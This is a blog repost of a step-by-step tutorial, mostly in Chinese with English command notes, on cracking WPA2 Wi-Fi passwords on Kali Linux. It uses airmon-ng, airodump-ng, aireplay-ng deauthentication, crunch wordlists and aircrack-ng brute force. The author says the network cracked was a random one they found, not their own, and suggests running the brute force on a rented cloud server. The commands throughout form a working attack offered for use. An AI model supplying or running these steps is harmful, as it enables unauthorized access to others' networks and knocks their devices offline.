Linux WIFI ATTACK

 

{

 

https://github.com/conwnet/wpa-dictionary
http://www.360doc.com/content/18/0827/09/52701931_781512408.shtml
https://www.cnblogs.com/a986771570/p/6210925.html

 

 

}

 

{

  //build password

  //abcdefghijklmnopqrstuvwxyz0123456789

  crunch 10 10 0123 -o ./password.txt

  sudo su

  airmon-ng start

  //wlan0mon or other

  //listen

  airodump-ng wlan0mon

  //open terminal

  //ch  + mac

  sudo su

 

  airodump-ng -c  ch  --bssid mac wlan0mon

  

  aireplay-ng -0 2 -a mac -c mac wlan0mon

  

  aircrack-ng -w password.txt *.cap

}

{

操作环境:kali

使用工具:aircrack-ng,crunch

    在家里闲来无事,便研究了一下怎么破解wifi密码,也算有点成就感.本文章争取通俗笼统,尽量保证让新手也能看懂,当然完全没Linux基础还是先去坐着吧。

不要对其中的命令死记硬背,先要把原理和步骤搞清楚

开始:


 

1.打开WIFI,但是要断开wifi连接,防止后面出现错误

2.airmon-ng  查看支持监控(moniter)的网卡,我的是wlan0,每个人可能会不同,按你的实际名称来(图1)

图1

3.airmon-ng start wlan0  开启该网卡监控模式(moniter),网卡名称变为wlan0mon,之后写网卡名称时不要错写成wlan0!我用airmon-ng命令重新确认了一下(图2)

 

图2

4.airodump-ng wlan0mon  使用该网卡开始扫描,显示一大批wifi热点,都是WPA2 加密模式,差不多选择完目标后可选择Ctrl+c停止扫描(图3)

 

图3

5.airodump --bssid   该wifi的bssid   --channel  该wifi的信道   --write  把捕获的包放到哪里    wlan0mon  (图4)

例如我选择第一个xiaomi则输入

airodump --bssid 34:80:B3:3C:FD:49  --channel  6  --write  xiaomi  wlan0mon    (建议先创建一个目录,在该目录下运行此命令)

图4

6.发现连接该wifi的有一台设备,我们需要获取该wifi的用户认证包,你可以一直等他下次重新上线,当然我们没那么有耐心,于是就有了下一个命令aireplay-ng(图4)

 

7.aireplay-ng -0 3 -a  该wifi的bssid   -c 连接该wifi的用户设备station  wlan0mon  (图5右侧)

(-0表示发送解除认证,让该设备重新连接以获取认证包,3表示发送3次,当该数为0时表示无限次,-a表示access point,-c表示client)

 

图5

运行该命令后图5左边窗口出现 【WPA handshake:......】说明抓到了认证包,可以与图4对比一下。完成之后记得用 airmon-ng stop wlan0mon 关闭网卡监听模式!

 

8.此步骤为额外步骤,可不进行。

我用wireshark打开捕获的包xiao.cap,点Protoco进行分类,确实发现了认证包

 

图6

 

9.有了认证包之后,我们破解还需要字典,一般人密码会用八位数字组成,于是我用crunch创建8位纯数字组成的字典,有837MB大小,对crunch工具不了解的自行百度

crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o wordlist.txt

调用密码库文件 charset.lst, 生成最小为8,最大为8,元素为密码库 charset.lst中 numeric的项目,并保存为 wordlist.txt;其中 charset.lst在kali_linux的目录 为 /usr/share/crunch/charset.lst, -o:用于指定输出字典文件的位置。

>想了解更多可以vim  /usr/share/crunch/charset.lst 查看所有密码库

图7

 

10.aircrack-ng    捕获的.cap包   -w 密码字典

 

图8

11.额外步骤,可不进行。

因为是自己随便找的wifi,所以用暴力破解看运气,很耗时间,所以我干脆把他放到租的云服务器里让他自个去运行,反正现在云服务器很便宜,用上screen命令让其在用户退出登陆时继续运行(不了解screen工具的自行百度,一个很好用的工具)

 



作者:颜科鸣_5482
链接:https://www.jianshu.com/p/893cc1224d34
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

}

 

posted @ 2020-05-20 23:44  YZFHKMS-X  阅读(226)  评论(0编辑  收藏  举报